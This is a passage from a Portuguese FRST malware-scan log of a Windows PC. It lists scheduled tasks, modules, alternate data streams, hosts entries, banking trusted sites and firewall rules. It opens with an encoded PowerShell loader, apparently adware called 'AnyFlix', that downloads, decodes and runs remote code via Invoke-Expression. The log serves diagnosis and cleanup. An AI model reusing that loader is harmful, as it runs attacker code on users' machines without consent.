BwAGcAUgBMAFAAWQBHAEEAUwBqAFMATQBSAFYAawA2AGUAcAA2AHYAQQBZAGoAVABFAHMAOAAxAGUAUQA3AEwAagBqAHQATgBJADcAMAAyAGsAZABYAHEAVQAtAFMAOABSAHgASAB5ADYAbwBUAGYAeQBqAG8ATgBrADUAXwBvAHIAXwBXAE0ASgA5AEEAMgBmAE4AQQBfAGoAbwBOADYATQBYAFoAdQB1AHkASQBPADQANABKADgAawByAEgASgBqAFAAawA3AG4AYQB1AG8ATwAyAGIAMgAxAEEAVAA2ADAASQBDAHcAZwBnADYALQBnAFkAbwBsAEIAVQB4AFIAOABBAG4AcQBIAFMAMwB4ADQAOABFAE0AVQBxAFoAZgBoAFkAVwBnAG4AUwBEAHcAZwBRAFoAeABUAE0AZQB1AGEAMQB6AF8ANABGAGoAMgBPAHYAQQBaAEMARABqAGsAbgA3AE0AdABOADkAbwBPADgAMABhAHEARAA4AGIAcQBEAGMAYwBIAGEAVQBNAEkAZQBkAHIASgBKADYAWQBIAE0ANQBBAE8ATwA2AFQAbABwAHkATABMAHQAVQBEAHMATABrAHEAcwA5AGwAdgA2AEwAdwBmADEAcABUAGQAeQB6AEcAMAAzAGMAMQB5AFEAdgBjAEYAcwBQAFQAaQBjAG4AagBWAEkAcgB0AGoASwBHAEEAcQByAFkANgBWAFkANwBQAEsAQgBkAGIAawBwAG8AXwBUAFYATQBqAC0AeQByAGUAcQBRADcATQBJAG4ASwBPAEUAZQBjAEUAaABGAFEANwBlADkAbABxAHoAZgBoAF8AcQBXAHEASAAyADgATQA4AGoASgBTAFEAMwBLAGMAdwBwAHEALQBEAG8ARgA3AG4AegBSAGYAcwBKAFEAQgBpAEsAVABoADEAJgBjAD0AOAA4ADUAbQByAGMAeABzAFkASQBoADkASgA5ADgAWQBHAHgAMgBuADMAOQBBAGIANwAzAFYAMAAzAC0AOABHAFoARgBTAFIAWAB6AHMAOQBUADMAXwBmAFcARABhAFoAbwB1AGwAVwBpAFMATABqADIAMgAwAEIATwBlAFAANAB6AGcAcABtAGMAWABWAGwAVQA2AGwAUwB0AFcAbQBKAE4AZwBUAFYAYgBtAC0AbABBADkATwBJAEoAbwBmAEMAVQBYAE0ANwAzAGwAeQBjADgAMQA5AFcAcAA2AFYAYQBXAEMAQgA4AG0AUABBADQARABUAHoAXwBhAF8ARgBzADEAaABXAHoAQQBtAF8AMgBRAFMAZgBrADEAdgBwAGoAVQBsADQAVABNAGUAcAB4AHkATwA1AFIAZgBNAHcAMgB2AGIANAB5AGIAeQBUAFQASwA5AFMAQQA0AEQAVgBHAEkAcQBqAGcAbAA1AFUAQQBHAGsAbwA2AHgAQQBZAGUATgBkAGsAdABNAEUAcgB6AFIATQBSAFUAYwBBAGoAdwBDAEMANABMAE8AbAByAFIARwBlAGEAUgBoAFQARQB4ADUATABUADgAZgB2AGkAOQB3AG8ANgBfAHAATABSAFEASABuAE4AVwBPADAAZgBZAFcAZwB2ADYAVwBjAEIAWgBJAEEAVwBCADAAZQA2AHcARgBjAEUAYQBjADIAbgAzAFIANgBvAFIAMQA4AGIAMQBZADkAQQBKAFIASwAzAFoAegBNAGgAOABPAE8AcQB5AGEAaAB4AEUAUwB2AC0ARwBHAGYAagBBAGEAUwB0AFQAawBBAG4AagByAEYAcgB1AGUAeQBuAF8ATwAzAHoAYQA1AEUAZwBoADIAUwBsAGQATQBwADMATQBCAEEAeABVAEgATQBKAF8AOQBrADAAbgBIAGgAeAA2AFYARQBkADgAWABaAEsAcABTADUAMAB2AGYAMAA0AGoATgBDAHcARgBLAGkAQwBGAEcANABPAFIAeABIADgAOABVADEAYQA1AGIAOQBTAEgAdwBtAGMAUABZAG4AVQBwADgAdAAyAGgALQA2AEMAUgBqADIANQAzAFEAMQBSAEUASAByAG8AUAAtAE4AMABYAEkAZgBnAEUAcgBrAHQAawA4AG4AYgBSADMAegB6AEQAMgA2AEIAUABsAEEAMgBLADQAMgBUAHQANQBHAFEAUwBUAG8AcQBHAFoAbwB3ADgAWABQADcAbgBiAC0AVgB4AFgAUQB1AF8AQwB6ADYAbABfAGwARABBAGYAdQBrAHQAdwBJADAALQBKAG0AWgBxADEANgBCAGIAYQAzAC0ANgBBAEQAeABVAEgARQBuAFMAMABrAGQAXwAtAEoAdQBpAFAAVgAxAEkAUABfAE8AVwB2ADcARwBFADEAdABSAEMATQBrAGgATQBxAGsAcAAxAEwAVgA2AGQASwBQAHgAMwBYADgAcQBOAFAAZwBmAHcAcgBpADYANwBMAEYAMwBXAHoAZQByAGoAMQB6AEsATwBXAGkASwAzAF8ATABFADYAMABhAEkAZQB1AE4AVgBLAE4AZgB4AEgAXwBPAC0AbwBuAEsANABYAEMAWAAzAFYAWgBOAFoARABIAEIASQBhAEoAZgByAHYAYwBBAGEAZwBGAHoAVgBKAHgANwAxAGoASgBJAEMAZwAwAGkAZQB2ADYASAByAHkAcwAwAEsAUgBIAFoAcgBDAEMAQQBiAEYASQBVAEUAVgAtAEcAUQBXAEcANABXAGkARgBUAHAANABwAG4AWgBmAEwAYwB2AGQAcQBVAFIAYQBvADcAawBOAHAAYgBoAHkASgBoAGUATgBQAHYAVwBvAGsAOQBzAC0ANwBZAFEAWQBJAHEANwBnAC0AUQBxAFYAOQBEADMAZABFAE4AaQA0AEUAQQBoAEoALQBUADAAZgBfAEUAMgBXAFoAUwAwADgAbwBxAGMARQBPAE0AawAtAHkAcgBNAGIAZwBqAHUAVgBaADQAeQBmADcAOABMAG0AeQBsAEwAZwA0AGEAaABhAFIAawBEAE4AegBEAGoAbAA3AEcASAByAEkANABTADIAbwBkAG8AdAA3AFEAYwBQAFcAWgBMAFQATQBxAHQATABoAEcAQwBuADIAdQBtAHYAMABYAHoAbwA1AHkANAA0AGUAdQB6AEcALQBuADEAZQB4AEEAVwBJAEgAVQBUAGoATwA0AEwAQQB5AHIARQBDAFQAaQBEADcAUwB4AFYAaABkAGIAQwBRAE0AcwBMAHMAdQBPAGEAaABpADMAQQB0AEkAYwBBAFAAcgBXADYAJgByAD0AMwA0ADIAMAAzADcAOQA2ADQAMgA5ADMAMwA2ADkANQAwADQANwAiADsAJABzAHQAcwBrAD0AIgB7ADAAQwAwAEEAMABEADQANwAtADAARgA3AEQALQAwAEYAMAA5AC0AMAA4ADEAMQAtADAAQgA3AEEAMAA4ADAAQwAxADEAMABEAH0AIgA7ACQAcAByAGkAZAA9ACIAQQBuAHkARgBsAGkAeAAiADsAJABpAG4AaQBkAD0AIgBJAEwATwBJAEkATgBTAEUAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core.job => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA.job => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core.job => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA.job => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

==================== Módulos Carregados (Whitelisted) ==============

2016-02-05 17:23 - 2016-02-05 17:23 - 00185344 _____ () C:\Program Files (x86)\455A527F-1454169737-DE11-88E5-00262236F727\knsfF36F.tmp
2014-10-26 22:59 - 2014-10-26 22:59 - 00039568 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-10-30 05:41 - 2014-10-30 05:41 - 00031856 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2016-01-30 14:03 - 2016-01-30 14:03 - 00416256 _____ () C:\Program Files (x86)\455A527F-1454169737-DE11-88E5-00262236F727\hnsj39B7.tmp
2014-06-25 17:51 - 2014-06-25 17:51 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-01-30 14:03 - 2016-01-30 14:03 - 00307712 _____ () C:\Program Files (x86)\455A527F-1454169737-DE11-88E5-00262236F727\jnsp1A25.tmp
2014-10-29 19:06 - 2014-10-29 19:06 - 00560192 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
2014-07-31 13:16 - 2014-07-31 13:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 13:16 - 2014-07-31 13:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-10-13 21:58 - 2014-12-15 10:27 - 00865880 _____ () c:\program files (x86)\real\realplayer\RPDS\Plugins\cldplin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00035976 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00039560 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00032888 _____ () C:\Program Files (x86)\Real\UpdateService\RPDSUpdatePlugin.dll
2015-12-15 18:48 - 2015-10-30 22:59 - 00034768 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00019408 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00022848 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Random.OSRNG.winrandom.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00023352 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Util._counter.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00042296 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Cipher._AES.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00116688 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2015-12-15 18:48 - 2015-10-30 22:59 - 00093640 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00018376 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\select.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00019760 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00105928 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32api.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00392144 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2015-12-15 18:48 - 2015-12-08 19:36 - 00381752 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00692688 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020816 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00109520 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 01737032 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020808 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020800 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_python_x66cf7a7cx17a72769.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00021840 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00038696 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\fastpath.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00024528 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32event.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00020936 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00114640 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32security.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00021320 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00124880 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32file.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00030160 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00043472 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32process.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00175560 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32gui.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00028616 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32ts.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00024016 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00048592 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32service.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00024392 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00036296 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\librsync.dll
2015-12-15 18:48 - 2015-10-30 23:00 - 00024016 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32profile.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00117056 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00023376 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00134608 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_elementtree.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00134088 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00240584 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\jpegtran.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020280 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00052024 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00021304 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Util.strxor.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00350152 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00084792 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2015-12-15 18:48 - 2015-12-08 19:36 - 01826608 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00083912 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\sip.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 03891504 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 01950000 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00519984 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00133936 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00225080 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00207672 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00024904 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00486704 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00357680 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2015-10-16 09:30 - 2015-10-30 23:01 - 00019920 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick.2\qtquick2plugin.dll
2015-10-03 21:49 - 2015-10-30 23:00 - 00786904 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-10-16 09:30 - 2015-10-30 23:00 - 00063448 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-10-16 09:30 - 2015-10-30 23:00 - 00019408 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick\Window.2\windowplugin.dll
2014-10-29 19:01 - 2014-10-29 19:01 - 01382048 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\cpprest100_1_2.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-02-04 22:27 - 2016-02-03 05:27 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libglesv2.dll
2016-02-04 22:27 - 2016-02-03 05:27 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg==
AlternateDataStreams: C:\Windows\System32:522FBA16_Bb.gbp
AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\bb.com.br -> hxxps://seg.bb.com.br

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-14 00:34 - 2016-01-30 14:01 - 00000170 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-1084134890-3557609745-897204792-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Volkhadan\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 201.17.128.71 - 201.17.128.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Spotify => "C:\Users\Volkhadan\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Volkhadan\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe" -osboot

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{56338F08-A179-47C8-9727-79CB8EBBDD73}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9306C707-B832-4215-983F-03E66CD20198}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{8FFE69A6-4DE7-45F8-90C6-2F6273CB9CB0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6BE9482F-A61F-4CCD-9CB6-50B0F7990A14}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
